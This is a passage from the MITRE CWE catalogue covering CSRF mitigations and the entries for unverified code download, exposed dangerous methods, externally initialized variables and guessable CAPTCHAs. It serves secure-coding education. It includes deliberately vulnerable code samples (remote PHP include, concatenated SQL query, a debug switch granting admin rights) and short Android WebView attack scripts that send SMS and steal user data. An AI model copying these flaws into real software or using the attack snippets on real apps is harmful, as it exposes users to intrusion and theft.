Ensure that the application is free of cross-site scripting issues (CWE-79), because most CSRF defenses can be bypassed using attacker-controlled script.

Phase: Architecture and Design

Generate a unique nonce for each form, place the nonce into the form, and verify the nonce upon receipt of the form. Be sure that the nonce is not predictable (CWE-330). [R.352.5]

Note that this can be bypassed using XSS (CWE-79).

Phase: Architecture and Design

Identify especially dangerous operations. When the user performs a dangerous operation, send a separate confirmation request to ensure that the user intended to perform that operation.

Note that this can be bypassed using XSS (CWE-79).

Phase: Architecture and Design

Use the "double-submitted cookie" method as described by Felten and Zeller:

When a user visits a site, the site should generate a pseudorandom value and set it as a cookie on the user's machine. The site should require every form submission to include this value as a form value and also as a cookie value. When a POST request is sent to the site, the request should only be considered valid if the form value and the cookie value are the same.

Because of the same-origin policy, an attacker cannot read or modify the value stored in the cookie. To successfully submit a form on behalf of the user, the attacker would have to correctly guess the pseudorandom value. If the pseudorandom value is cryptographically strong, this will be prohibitively difficult.

This technique requires Javascript, so it may not work for browsers that have Javascript disabled. [R.352.4]

Note that this can probably be bypassed using XSS (CWE-79), or when using web technologies that enable the attacker to read raw headers from HTTP requests.

Phase: Architecture and Design

Do not use the GET method for any request that triggers a state change.

Phase: Implementation

Check the HTTP Referer header to see if the request originated from an expected page. This could break legitimate functionality, because users or proxies may have disabled sending the Referer for privacy reasons.

Note that this can be bypassed using XSS (CWE-79). An attacker could use XSS to generate a spoofed Referer, or to generate a malicious request from a page whose Referer would be allowed.

+ Relationships
NatureTypeIDNameView(s) this relationship pertains toView(s)
RequiresWeakness BaseWeakness Base346Origin Validation Error
Research Concepts1000
RequiresWeakness ClassWeakness Class441Unintended Proxy or Intermediary ('Confused Deputy')
Research Concepts1000
RequiresWeakness BaseWeakness Base613Insufficient Session Expiration
Research Concepts1000
RequiresWeakness ClassWeakness Class642External Control of Critical State Data
Research Concepts1000
ChildOfWeakness ClassWeakness Class345Insufficient Verification of Data Authenticity
Development Concepts (primary)699
Research Concepts (primary)1000
Weaknesses for Simplified Mapping of Published Vulnerabilities (primary)1003
ChildOfCategoryCategory442Web Problems
Development Concepts699
ChildOfCategoryCategory716OWASP Top Ten 2007 Category A5 - Cross Site Request Forgery (CSRF)
Weaknesses in OWASP Top Ten (2007) (primary)629
ChildOfCategoryCategory7512009 Top 25 - Insecure Interaction Between Components
Weaknesses in the 2009 CWE/SANS Top 25 Most Dangerous Programming Errors (primary)750
ChildOfCategoryCategory8012010 Top 25 - Insecure Interaction Between Components
Weaknesses in the 2010 CWE/SANS Top 25 Most Dangerous Programming Errors (primary)800
ChildOfCategoryCategory814OWASP Top Ten 2010 Category A5 - Cross-Site Request Forgery(CSRF)
Weaknesses in OWASP Top Ten (2010) (primary)809
ChildOfCategoryCategory8642011 Top 25 - Insecure Interaction Between Components
Weaknesses in the 2011 CWE/SANS Top 25 Most Dangerous Software Errors (primary)900
ChildOfCategoryCategory936OWASP Top Ten 2013 Category A8 - Cross-Site Request Forgery (CSRF)
Weaknesses in OWASP Top Ten (2013) (primary)928
MemberOfViewView635Weaknesses Used by NVD
Weaknesses Used by NVD (primary)635
MemberOfViewView884CWE Cross-section
CWE Cross-section (primary)884
PeerOfWeakness BaseWeakness Base79Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
Research Concepts1000
+ Relationship Notes

This can be resultant from XSS, although XSS is not necessarily required.

+ Research Gaps

This issue was under-reported in CVE until around 2008, when it began to gain prominence. It is likely to be present in most web applications.

+ Theoretical Notes

The CSRF topology is multi-channel:

1. Attacker (as outsider) to intermediary (as user). The interaction point is either an external or internal channel.

2. Intermediary (as user) to server (as victim). The activation point is an internal channel.

+ Taxonomy Mappings
Mapped Taxonomy NameNode IDFitMapped Node Name
PLOVERCross-Site Request Forgery (CSRF)
OWASP Top Ten 2007A5ExactCross Site Request Forgery (CSRF)
WASC9Cross-site Request Forgery
+ References
[R.352.1] [REF-17] Michael Howard, David LeBlanc and John Viega. "24 Deadly Sins of Software Security". "Sin 2: Web-Server Related Vulnerabilities (XSS, XSRF, and Response Splitting)." Page 37. McGraw-Hill. 2010.
[R.352.2] Peter W. "Cross-Site Request Forgeries (Re: The Dangers of Allowing Users to Post Images)". Bugtraq. <http://marc.info/?l=bugtraq&m=99263135911884&w=2>.
[R.352.3] OWASP. "Cross-Site Request Forgery (CSRF) Prevention Cheat Sheet". <http://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)_Prevention_Cheat_Sheet>.
[R.352.4] Edward W. Felten and William Zeller. "Cross-Site Request Forgeries: Exploitation and Prevention". 2008-10-18. <http://citeseerx.ist.psu.edu/viewdoc/summary?doi=10.1.1.147.1445>.
[R.352.5] Robert Auger. "CSRF - The Cross-Site Request Forgery (CSRF/XSRF) FAQ". <http://www.cgisecurity.com/articles/csrf-faq.shtml>.
[R.352.6] "Cross-site request forgery". Wikipedia. 2008-12-22. <http://en.wikipedia.org/wiki/Cross-site_request_forgery>.
[R.352.7] Jason Lam. "Top 25 Series - Rank 4 - Cross Site Request Forgery". SANS Software Security Institute. 2010-03-03. <http://software-security.sans.org/blog/2010/03/03/top-25-series-rank-4-cross-site-request-forgery>.
[R.352.8] Jeff Atwood. "Preventing CSRF and XSRF Attacks". 2008-10-14. <http://www.codinghorror.com/blog/2008/10/preventing-csrf-and-xsrf-attacks.html>.
[R.352.9] [REF-21] OWASP. "OWASP Enterprise Security API (ESAPI) Project". <http://www.owasp.org/index.php/ESAPI>.
+ Content History
Submissions
Submission DateSubmitterOrganizationSource
PLOVERExternally Mined
Modifications
Modification DateModifierOrganizationSource
2008-07-01Eric DalciCigitalExternal
updated Time_of_Introduction
2008-09-08CWE Content TeamMITREInternal
updated Alternate_Terms, Description, Relationships, Other_Notes, Relationship_Notes, Taxonomy_Mappings
2009-01-12CWE Content TeamMITREInternal
updated Applicable_Platforms, Description, Likelihood_of_Exploit, Observed_Examples, Other_Notes, Potential_Mitigations, References, Relationship_Notes, Relationships, Research_Gaps, Theoretical_Notes
2009-03-10CWE Content TeamMITREInternal
updated Potential_Mitigations
2009-05-20Tom StracenerExternal
Added demonstrative example for profile.
2009-05-27CWE Content TeamMITREInternal
updated Demonstrative_Examples, Related_Attack_Patterns
2009-12-28CWE Content TeamMITREInternal
updated Common_Consequences, Demonstrative_Examples, Detection_Factors, Likelihood_of_Exploit, Observed_Examples, Potential_Mitigations, Time_of_Introduction
2010-02-16CWE Content TeamMITREInternal
updated Applicable_Platforms, Detection_Factors, References, Relationships, Taxonomy_Mappings
2010-06-21CWE Content TeamMITREInternal
updated Common_Consequences, Detection_Factors, Potential_Mitigations, References, Relationships
2010-09-27CWE Content TeamMITREInternal
updated Potential_Mitigations
2011-03-29CWE Content TeamMITREInternal
updated Description
2011-06-01CWE Content TeamMITREInternal
updated Common_Consequences
2011-06-27CWE Content TeamMITREInternal
updated Relationships
2011-09-13CWE Content TeamMITREInternal
updated Potential_Mitigations, References
2012-05-11CWE Content TeamMITREInternal
updated Related_Attack_Patterns, Relationships
2012-10-30CWE Content TeamMITREInternal
updated Potential_Mitigations
2013-02-21CWE Content TeamMITREInternal
updated Relationships
2013-07-17CWE Content TeamMITREInternal
updated References, Relationships
2014-07-30CWE Content TeamMITREInternal
updated Detection_Factors
2015-12-07CWE Content TeamMITREInternal
updated Relationships

CWE-494: Download of Code Without Integrity Check

Weakness ID: 494
Abstraction: Base
Status: Draft
Presentation Filter:
+ Description

Description Summary

The product downloads source code or an executable from a remote location and executes the code without sufficiently verifying the origin and integrity of the code.

Extended Description

An attacker can execute malicious code by compromising the host server, performing DNS spoofing, or modifying the code in transit.

+ Time of Introduction
  • Architecture and Design
  • Implementation
+ Applicable Platforms

Languages

Language-independent

+ Common Consequences
ScopeEffect
Integrity
Availability
Confidentiality
Other

Technical Impact: Execute unauthorized code or commands; Alter execution logic; Other

Executing untrusted code could compromise the control flow of the program. The untrusted code could execute attacker-controlled commands, read or modify sensitive resources, or prevent the software from functioning correctly for legitimate users.

+ Likelihood of Exploit

Medium

+ Detection Methods

Manual Analysis

This weakness can be detected using tools and techniques that require manual (human) analysis, such as penetration testing, threat modeling, and interactive tools that allow the tester to record and modify an active session.

Specifically, manual static analysis is typically required to find the behavior that triggers the download of code, and to determine whether integrity-checking methods are in use.

These may be more effective than strictly automated techniques. This is especially the case with weaknesses that are related to design and business rules.

Black Box

Use monitoring tools that examine the software's process as it interacts with the operating system and the network. This technique is useful in cases when source code is unavailable, if the software was not developed by you, or if you want to verify that the build phase did not introduce any new weaknesses. Examples include debuggers that directly attach to the running process; system-call tracing utilities such as truss (Solaris) and strace (Linux); system activity monitors such as FileMon, RegMon, Process Monitor, and other Sysinternals utilities (Windows); and sniffers and protocol analyzers that monitor network traffic.

Attach the monitor to the process and also sniff the network connection. Trigger features related to product updates or plugin installation, which is likely to force a code download. Monitor when files are downloaded and separately executed, or if they are otherwise read back into the process. Look for evidence of cryptographic library calls that use integrity checking.

+ Demonstrative Examples

Example 1

This example loads an external class from a local subdirectory.

(Bad Code)
Example Language: Java 
URL[] classURLs= new URL[]{
new URL("file:subdir/")
};
URLClassLoader loader = new URLClassLoader(classURLs);
Class loadedClass = Class.forName("loadMe", true, loader);

This code does not ensure that the class loaded is the intended one, for example by verifying the class's checksum. An attacker may be able to modify the class file to execute malicious code.

Example 2

This code includes an external script to get database credentials, then authenticates a user against the database, allowing access to the application.

(Bad Code)
Example Language: PHP 
//assume the password is already encrypted, avoiding CWE-312
function authenticate($username,$password){
include("http://external.example.com/dbInfo.php");
//dbInfo.php makes $dbhost, $dbuser, $dbpass, $dbname available
mysql_connect($dbhost, $dbuser, $dbpass) or die ('Error connecting to mysql');
mysql_select_db($dbname);
$query = 'Select * from users where username='.$username.' And password='.$password;
$result = mysql_query($query);
if(mysql_numrows($result) == 1){
mysql_close();
return true;
}
else{
mysql_close();
return false;
}
}

This code does not verify that the external domain accessed is the intended one. An attacker may somehow cause the external domain name to resolve to an attack server, which would provide the information for a false database. The attacker may then steal the usernames and encrypted passwords from real user login attempts, or simply allow himself to access the application without a real user account.

This example is also vulnerable to a Man in the Middle (CWE-300) attack.

+ Observed Examples
ReferenceDescription
OS does not verify authenticity of its own updates.
online poker client does not verify authenticity of its own updates.
anti-virus product does not verify automatic updates for itself.
VOIP phone downloads applications from web sites without verifying integrity.
+ Potential Mitigations

Phase: Implementation

Perform proper forward and reverse DNS lookups to detect DNS spoofing.

This is only a partial solution since it will not prevent your code from being modified on the hosting site or in transit.

Phases: Architecture and Design; Operation

Encrypt the code with a reliable encryption scheme before transmitting.

This will only be a partial solution, since it will not detect DNS spoofing and it will not prevent your code from being modified on the hosting site.

Phase: Architecture and Design

Strategy: Libraries or Frameworks

Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.

Speficially, it may be helpful to use tools or frameworks to perform integrity checking on the transmitted code.

  • When providing the code that is to be downloaded, such as for automatic updates of the software, then use cryptographic signatures for the code and modify the download clients to verify the signatures. Ensure that the implementation does not contain CWE-295, CWE-320, CWE-347, and related weaknesses.

  • Use code signing technologies such as Authenticode. See references [R.494.1] [R.494.2] [R.494.3].

Phases: Architecture and Design; Operation

Strategy: Environment Hardening

Run your code using the lowest privileges that are required to accomplish the necessary tasks [R.494.7]. If possible, create isolated accounts with limited privileges that are only used for a single task. That way, a successful attack will not immediately give the attacker access to the rest of the software or its environment. For example, database applications rarely need to run as the database administrator, especially in day-to-day operations.

Phases: Architecture and Design; Operation

Strategy: Sandbox or Jail

Run the code in a "jail" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict which files can be accessed in a particular directory or which commands can be executed by the software.

OS-level examples include the Unix chroot jail, AppArmor, and SELinux. In general, managed code may provide some protection. For example, java.io.FilePermission in the Java SecurityManager allows the software to specify restrictions on file operations.

This may not be a feasible solution, and it only limits the impact to the operating system; the rest of the application may still be subject to compromise.

Be careful to avoid CWE-243 and other weaknesses related to jails.

Effectiveness: Limited

The effectiveness of this mitigation depends on the prevention capabilities of the specific sandbox or jail being used and might only help to reduce the scope of an attack, such as restricting the attacker to certain system calls or limiting the portion of the file system that can be accessed.

+ Relationships
NatureTypeIDNameView(s) this relationship pertains toView(s)
ChildOfCategoryCategory490Mobile Code Issues
Development Concepts (primary)699
ChildOfWeakness ClassWeakness Class669Incorrect Resource Transfer Between Spheres
Research Concepts (primary)1000
ChildOfCategoryCategory7522009 Top 25 - Risky Resource Management
Weaknesses in the 2009 CWE/SANS Top 25 Most Dangerous Programming Errors (primary)750
ChildOfCategoryCategory8022010 Top 25 - Risky Resource Management
Weaknesses in the 2010 CWE/SANS Top 25 Most Dangerous Programming Errors (primary)800
ChildOfCategoryCategory859CERT Java Secure Coding Section 14 - Platform Security (SEC)
Weaknesses Addressed by the CERT Java Secure Coding Standard (primary)844
ChildOfCategoryCategory8652011 Top 25 - Risky Resource Management
Weaknesses in the 2011 CWE/SANS Top 25 Most Dangerous Software Errors (primary)900
ChildOfCategoryCategory991SFP Secondary Cluster: Tainted Input to Environment
Software Fault Pattern (SFP) Clusters (primary)888
PeerOfWeakness BaseWeakness Base79Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
Research Concepts1000
MemberOfViewView884CWE Cross-section
CWE Cross-section (primary)884
CanFollowWeakness BaseWeakness Base79Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
Research Concepts1000
+ Research Gaps

This is critical for mobile code, but it is likely to become more and more common as developers continue to adopt automated, network-based product distributions and upgrades. Software-as-a-Service (SaaS) might introduce additional subtleties. Common exploitation scenarios may include ad server compromises and bad upgrades.

+ Taxonomy Mappings
Mapped Taxonomy NameNode IDFitMapped Node Name
CLASPInvoking untrusted mobile code
CERT Java Secure CodingSEC06-JDo not rely on the default automatic signature verification provided by URLClassLoader and java.util.jar
Software Fault PatternsSFP27Tainted input to environment
+ References
[R.494.1] Microsoft. "Introduction to Code Signing". <http://msdn.microsoft.com/en-us/library/ms537361(VS.85).aspx>.
[R.494.3] Apple. "Code Signing Guide". Apple Developer Connection. 2008-11-19. <http://developer.apple.com/documentation/Security/Conceptual/CodeSigningGuide/Introduction/chapter_1_section_1.html>.
[R.494.4] Anthony Bellissimo, John Burgess and Kevin Fu. "Secure Software Updates: Disappointments and New Challenges". <http://prisms.cs.umass.edu/~kevinfu/papers/secureupdates-hotsec06.pdf>.
[R.494.5] [REF-17] Michael Howard, David LeBlanc and John Viega. "24 Deadly Sins of Software Security". "Sin 18: The Sins of Mobile Code." Page 267. McGraw-Hill. 2010.
[R.494.6] Johannes Ullrich. "Top 25 Series - Rank 20 - Download of Code Without Integrity Check". SANS Software Security Institute. 2010-04-05. <http://blogs.sans.org/appsecstreetfighter/2010/04/05/top-25-series-rank-20-download-code-integrity-check/>.
[R.494.7] [REF-31] Sean Barnum and Michael Gegick. "Least Privilege". 2005-09-14. <https://buildsecurityin.us-cert.gov/daisy/bsi/articles/knowledge/principles/351.html>.
+ Content History
Submissions
Submission DateSubmitterOrganizationSource
CLASPExternally Mined
Modifications
Modification DateModifierOrganizationSource
2008-07-01Eric DalciCigitalExternal
updated Time_of_Introduction
2008-09-08CWE Content TeamMITREInternal
updated Relationships, Other_Notes, Taxonomy_Mappings
2009-01-12CWE Content TeamMITREInternal
updated Applicable_Platforms, Common_Consequences, Description, Name, Other_Notes, Potential_Mitigations, References, Relationships, Research_Gaps, Type
2009-03-10CWE Content TeamMITREInternal
updated Potential_Mitigations
2009-07-27CWE Content TeamMITREInternal
updated Description, Observed_Examples, Related_Attack_Patterns
2010-02-16CWE Content TeamMITREInternal
updated Detection_Factors, References, Relationships
2010-04-05CWE Content TeamMITREInternal
updated Applicable_Platforms
2010-06-21CWE Content TeamMITREInternal
updated Common_Consequences, Detection_Factors, Potential_Mitigations, References
2010-09-27CWE Content TeamMITREInternal
updated Potential_Mitigations, References
2010-12-13CWE Content TeamMITREInternal
updated Potential_Mitigations
2011-03-29CWE Content TeamMITREInternal
updated Demonstrative_Examples
2011-06-01CWE Content TeamMITREInternal
updated Common_Consequences, Relationships, Taxonomy_Mappings
2011-06-27CWE Content TeamMITREInternal
updated Relationships
2011-09-13CWE Content TeamMITREInternal
updated Potential_Mitigations, References
2012-05-11CWE Content TeamMITREInternal
updated References, Relationships, Taxonomy_Mappings
2012-10-30CWE Content TeamMITREInternal
updated Potential_Mitigations
2014-07-30CWE Content TeamMITREInternal
updated Relationships, Taxonomy_Mappings
Previous Entry Names
Change DatePrevious Entry Name
2008-04-11Mobile Code: Invoking Untrusted Mobile Code
2009-01-12Download of Untrusted Mobile Code Without Integrity Check

CWE-749: Exposed Dangerous Method or Function

Weakness ID: 749
Abstraction: Base
Status: Incomplete
Presentation Filter:
+ Description

Description Summary

The software provides an Applications Programming Interface (API) or similar interface for interaction with external actors, but the interface includes a dangerous method or function that is not properly restricted.

Extended Description

This weakness can lead to a wide variety of resultant weaknesses, depending on the behavior of the exposed method. It can apply to any number of technologies and approaches, such as ActiveX controls, Java functions, IOCTLs, and so on.

The exposure can occur in a few different ways:

1) The function/method was never intended to be exposed to outside actors.

2) The function/method was only intended to be accessible to a limited set of actors, such as Internet-based access from a single web site.

+ Time of Introduction
  • Architecture and Design
  • Implementation
+ Applicable Platforms

Languages

Language-independent

+ Common Consequences
ScopeEffect
Integrity
Confidentiality
Availability
Access Control
Other

Technical Impact: Gain privileges / assume identity; Read application data; Modify application data; Execute unauthorized code or commands; Other

Exposing critical functionality essentially provides an attacker with the privilege level of the exposed functionality. This could result in the modification or exposure of sensitive data or possibly even execution of arbitrary code.

+ Likelihood of Exploit

Low to Medium

+ Demonstrative Examples

Example 1

In the following Java example the method removeDatabase will delete the database with the name specified in the input parameter.

(Bad Code)
Example Language: Java 
public void removeDatabase(String databaseName) {
try {
Statement stmt = conn.createStatement();
stmt.execute("DROP DATABASE " + databaseName);

} catch (SQLException ex) {...}
}

The method in this example is declared public and therefore is exposed to any class in the application. Deleting a database should be considered a critical operation within an application and access to this potentially dangerous method should be restricted. Within Java this can be accomplished simply by declaring the method private thereby exposing it only to the enclosing class as in the following example.

(Good Code)
Example Language: Java 
private void removeDatabase(String databaseName) {
try {
Statement stmt = conn.createStatement();
stmt.execute("DROP DATABASE " + databaseName);

} catch (SQLException ex) {...}
}

Example 2

These Android and iOS applications intercept URL loading within a WebView and perform special actions if a particular URL scheme is used, thus allowing the Javascript within the WebView to communicate with the application:

(Bad Code)
Example Language: Java 
// Android

@Override
public boolean shouldOverrideUrlLoading(WebView view, String url){
if (url.substring(0,14).equalsIgnoreCase("examplescheme:")){
if(url.substring(14,25).equalsIgnoreCase("getUserInfo")){
writeDataToView(view, UserData);
return false;
}
else{
return true;
}
}
}
(Bad Code)
Example Language: Objective-C 
// iOS

-(BOOL) webView:(UIWebView *)exWebView shouldStartLoadWithRequest:(NSURLRequest *)exRequest navigationType:(UIWebViewNavigationType)exNavigationType
{
NSURL *URL = [exRequest URL];
if ([[URL scheme] isEqualToString:@"exampleScheme"])
{
NSString *functionString = [URL resourceSpecifier];
if ([functionString hasPrefix:@"specialFunction"])
{
// Make data available back in webview.
UIWebView *webView = [self writeDataToView:[URL query]];
}
return NO;
}
return YES;
}

A call into native code can then be initiated by passing parameters within the URL:

(Attack)
Example Language: Javascript 
window.location = examplescheme://method?parameter=value

Because the application does not check the source, a malicious website loaded within this WebView has the same access to the API as a trusted site.

Example 3

This application uses a WebView to display websites, and creates a Javascript interface to a Java object to allow enhanced functionality on a trusted website:

(Bad Code)
Example Language: Java 
public class WebViewGUI extends Activity {
WebView mainWebView;

public void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
mainWebView = new WebView(this);
mainWebView.getSettings().setJavaScriptEnabled(true);
mainWebView.addJavascriptInterface(new JavaScriptInterface(), "userInfoObject");
mainWebView.loadUrl("file:///android_asset/www/index.html");
setContentView(mainWebView);
}

final class JavaScriptInterface {
JavaScriptInterface () {}

public String getUserInfo() {
return currentUser.Info();
}
}
}

Before Android 4.2 all methods, including inherited ones, are exposed to Javascript when using addJavascriptInterface(). This means that a malicious website loaded within this WebView can use reflection to acquire a reference to arbitrary Java objects. This will allow the website code to perform any action the parent application is authorized to.

For example, if the application has permission to send text messages:

(Attack)
Example Language: Javascript 
<script>
userInfoObject.getClass().forName('android.telephony.SmsManager').getMethod('getDefault',null).sendTextMessage(attackNumber, null, attackMessage, null, null);
</script>

This malicious script can use the userInfoObject object to load the SmsManager object and send arbitrary text messages to any recipient.

Example 4

After Android 4.2, only methods annotated with @JavascriptInterface are available in JavaScript, protecting usage of getClass() by default, as in this example:

(Bad Code)
Example Language: Java 
final class JavaScriptInterface {
JavaScriptInterface () { }

@JavascriptInterface
public String getUserInfo() {
return currentUser.Info();
}
}

This code is not vulnerable to the above attack, but still may expose user info to malicious pages loaded in the WebView. Even malicious iframes loaded within a trusted page may access the exposed interface:

(Attack)
Example Language: Javascript 
<script>
var info = window.userInfoObject.getUserInfo();
sendUserInfo(info);
</script>

This malicious code within an iframe is able to access the interface object and steal the user's data.

+ Observed Examples
ReferenceDescription
arbitrary Java code execution via exposed method
security tool ActiveX control allows download or upload of files
+ Potential Mitigations

Phase: Architecture and Design

If you must expose a method, make sure to perform input validation on all arguments, limit access to authorized parties, and protect against all possible vulnerabilities.

Phases: Architecture and Design; Implementation

Strategy: Identify and Reduce Attack Surface

Identify all exposed functionality. Explicitly list all functionality that must be exposed to some user or set of users. Identify which functionality may be:

  • accessible to all users

  • restricted to a small set of privileged users

  • prevented from being directly accessible at all

Ensure that the implemented code follows these expectations. This includes setting the appropriate access modifiers where applicable (public, private, protected, etc.) or not marking ActiveX controls safe-for-scripting.

+ Weakness Ordinalities
OrdinalityDescription
Primary
(where the weakness exists independent of other weaknesses)
+ Relationships
NatureTypeIDNameView(s) this relationship pertains toView(s)
ChildOfWeakness ClassWeakness Class485Insufficient Encapsulation
Development Concepts (primary)699
Research Concepts (primary)1000
Weaknesses for Simplified Mapping of Published Vulnerabilities (primary)1003
ChildOfWeakness ClassWeakness Class691Insufficient Control Flow Management
Research Concepts1000
ChildOfCategoryCategory8082010 Top 25 - Weaknesses On the Cusp
Weaknesses in the 2010 CWE/SANS Top 25 Most Dangerous Programming Errors (primary)800
ChildOfCategoryCategory975SFP Secondary Cluster: Architecture
Software Fault Pattern (SFP) Clusters (primary)888
ParentOfWeakness BaseWeakness Base618Exposed Unsafe ActiveX Method
Research Concepts (primary)1000
ParentOfWeakness VariantWeakness Variant782Exposed IOCTL with Insufficient Access Control
Development Concepts (primary)699
Research Concepts (primary)1000
+ Research Gaps

Under-reported and under-studied. This weakness could appear in any technology, language, or framework that allows the programmer to provide a functional interface to external parties, but it is not heavily reported. In 2007, CVE began showing a notable increase in reports of exposed method vulnerabilities in ActiveX applications, as well as IOCTL access to OS-level resources. These weaknesses have been documented for Java applications in various secure programming sources, but there are few reports in CVE, which suggests limited awareness in most parts of the vulnerability research community.

+ Content History
Submissions
Submission DateSubmitterOrganizationSource
2008-11-24Internal CWE Team
Modifications
Modification DateModifierOrganizationSource
2009-01-12CWE Content TeamMITREInternal
updated Name
2009-07-27CWE Content TeamMITREInternal
updated Relationships
2009-12-28CWE Content TeamMITREInternal
updated Applicable_Platforms, Likelihood_of_Exploit
2010-02-16CWE Content TeamMITREInternal
updated Common_Consequences, Demonstrative_Examples, Potential_Mitigations, References, Related_Attack_Patterns, Relationships
2010-04-05CWE Content TeamMITREInternal
updated Demonstrative_Examples, Related_Attack_Patterns
2010-06-21CWE Content TeamMITREInternal
updated Common_Consequences
2011-06-01CWE Content TeamMITREInternal
updated Common_Consequences
2012-05-11CWE Content TeamMITREInternal
updated Relationships
2014-02-18CWE Content TeamMITREInternal
updated Demonstrative_Examples
2014-07-30CWE Content TeamMITREInternal
updated Relationships
2015-12-07CWE Content TeamMITREInternal
updated Relationships
Previous Entry Names
Change DatePrevious Entry Name
2009-01-12Exposed Insecure Method or Function

CWE-454: External Initialization of Trusted Variables or Data Stores

Weakness ID: 454
Abstraction: Base
Status: Draft
Presentation Filter:
+ Description

Description Summary

The software initializes critical internal variables or data stores using inputs that can be modified by untrusted actors.

Extended Description

A software system should be reluctant to trust variables that have been initialized outside of its trust boundary, especially if they are initialized by users. They may have been initialized incorrectly. If an attacker can initialize the variable, then he/she can influence what the vulnerable system will do.

+ Time of Introduction
  • Architecture and Design
  • Implementation
+ Applicable Platforms

Languages

PHP: (Sometimes)

Language-independent

Platform Notes

This is often found in PHP due to register_globals and the common practice of storing library/include files under the web document root so that they are available using a direct request.

+ Common Consequences
ScopeEffect
Integrity

Technical Impact: Modify application data

An attacker could gain access to and modify sensitive data or system information.

+ Demonstrative Examples

Example 1

In the Java example below, a system property controls the debug level of the application.

(Bad Code)
Example Language: Java 
int debugLevel = Integer.getInteger("com.domain.application.debugLevel").intValue();

If an attacker is able to modify the system property, then it may be possible to coax the application into divulging sensitive information by virtue of the fact that additional debug information is printed/exposed as the debug level increases.

Example 2

This code checks the HTTP POST request for a debug switch, and enables a debug mode if the switch is set.

(Bad Code)
Example Language: PHP 
$debugEnabled = false;
if ($_POST["debug"] == "true"){
$debugEnabled = true;
}
/.../
function login($username, $password){
if($debugEnabled){
echo 'Debug Activated';
phpinfo();
$isAdmin = True;
return True;
}
}

Any user can activate the debug mode, gaining administrator privileges. An attacker may also use the information printed by the phpinfo() function to further exploit the system. .

This example also exhibits Information Exposure Through Debug Information (CWE-215)

+ Observed Examples
ReferenceDescription
Does not clear dangerous environment variables, enabling symlink attack.
Specify alternate configuration directory in environment variable, enabling untrusted path.
Dangerous environment variable not cleansed.
Specify arbitrary modules using environment variable.
+ Potential Mitigations

Phase: Implementation

Strategy: Input Validation

A software system should be reluctant to trust variables that have been initialized outside of its trust boundary. Ensure adequate checking (e.g. input validation) is performed when relying on input from outside a trust boundary.

Phase: Architecture and Design

Avoid any external control of variables. If necessary, restrict the variables that can be modified using a whitelist, and use a different namespace or naming convention if possible.

+ Relationships
NatureTypeIDNameView(s) this relationship pertains toView(s)
ChildOfCategoryCategory452Initialization and Cleanup Errors
Development Concepts (primary)699
ChildOfWeakness ClassWeakness Class665Improper Initialization
Research Concepts (primary)1000
ChildOfCategoryCategory8082010 Top 25 - Weaknesses On the Cusp
Weaknesses in the 2010 CWE/SANS Top 25 Most Dangerous Programming Errors (primary)800
ChildOfCategoryCategory994SFP Secondary Cluster: Tainted Input to Variable
Software Fault Pattern (SFP) Clusters (primary)888
CanAlsoBeWeakness BaseWeakness Base456Missing Initialization of a Variable
Research Concepts1000
MemberOfViewView884CWE Cross-section
CWE Cross-section (primary)884
+ Relationship Notes

Overlaps Missing variable initialization, especially in PHP.

+ Taxonomy Mappings
Mapped Taxonomy NameNode IDFitMapped Node Name
PLOVERExternal initialization of trusted variables or values
Software Fault PatternsSFP25Tainted input to variable
+ Content History
Submissions
Submission DateSubmitterOrganizationSource
PLOVERExternally Mined
Modifications
Modification DateModifierOrganizationSource
2008-07-01Sean EidemillerCigitalExternal
added/updated demonstrative examples
2008-07-01Eric DalciCigitalExternal
updated Potential_Mitigations, Time_of_Introduction
2008-09-08CWE Content TeamMITREInternal
updated Applicable_Platforms, Description, Relationships, Other_Notes, Taxonomy_Mappings
2009-10-29CWE Content TeamMITREInternal
updated Other_Notes, Relationship_Notes
2010-02-16CWE Content TeamMITREInternal
updated Description, Name, Relationships
2010-04-05CWE Content TeamMITREInternal
updated Applicable_Platforms, Demonstrative_Examples
2011-03-29CWE Content TeamMITREInternal
updated Demonstrative_Examples
2011-06-01CWE Content TeamMITREInternal
updated Common_Consequences, Relationships, Taxonomy_Mappings
2012-05-11CWE Content TeamMITREInternal
updated Common_Consequences, Relationships, Taxonomy_Mappings
2012-10-30CWE Content TeamMITREInternal
updated Potential_Mitigations
2014-07-30CWE Content TeamMITREInternal
updated Relationships, Taxonomy_Mappings
Previous Entry Names
Change DatePrevious Entry Name
2008-04-11External Initialization of Trusted Variables or Values
2010-02-16External Initialization of Trusted Variables

CWE-804: Guessable CAPTCHA

Weakness ID: 804
Abstraction: Base
Status: Incomplete
Presentation Filter:
+ Description

Description Summary

The software uses a CAPTCHA challenge, but the challenge can be guessed or automatically recognized by a non-human actor.

Extended Description

An automated attacker could bypass the intended protection of the CAPTCHA challenge and perform actions at a higher frequency than humanly possible, such as launching spam attacks.

There can be several different causes of a guessable CAPTCHA:

  • An audio or visual image that does not have sufficient distortion from the unobfuscated source image.

  • A question is generated that with a format that can be automatically recognized, such as a math question.

  • A question for which the number of possible answers is limited, such as birth years or favorite sports teams.

  • A general-knowledge or trivia question for which the answer can be accessed using a data base, such as country capitals or popular actors.

  • Other data associated with the CAPTCHA may provide hints about its contents, such as an image whose filename contains the word that is used in the CAPTCHA.

+ Time of Introduction
  • Architecture and Design
  • Implementation
+ Applicable Platforms

Languages

Language-independent

Technology Classes

Web-Server: (Sometimes)

+ Common Consequences
ScopeEffect
Access Control
Other

Technical Impact: Bypass protection mechanism; Other

When authorization, authentication, or another protection mechanism relies on CAPTCHA entities to ensure that only human actors can access certain functionality, then an automated attacker such as a bot may access the restricted functionality by guessing the CAPTCHA.

+ Likelihood of Exploit

Medium to High

+ Weakness Ordinalities
OrdinalityDescription
Primary
(where the weakness exists independent of other weaknesses)
+ Relationships
NatureTypeIDNameView(s) this relationship pertains toView(s)
ChildOfWeakness ClassWeakness Class287Improper Authentication
Development Concepts699
Research Concepts1000
ChildOfWeakness ClassWeakness Class330Use of Insufficiently Random Values
Development Concepts699
Research Concepts1000
ChildOfCategoryCategory8082010 Top 25 - Weaknesses On the Cusp
Weaknesses in the 2010 CWE/SANS Top 25 Most Dangerous Programming Errors (primary)800
ChildOfWeakness ClassWeakness Class863Incorrect Authorization
Development Concepts (primary)699
Research Concepts (primary)1000
+ Taxonomy Mappings
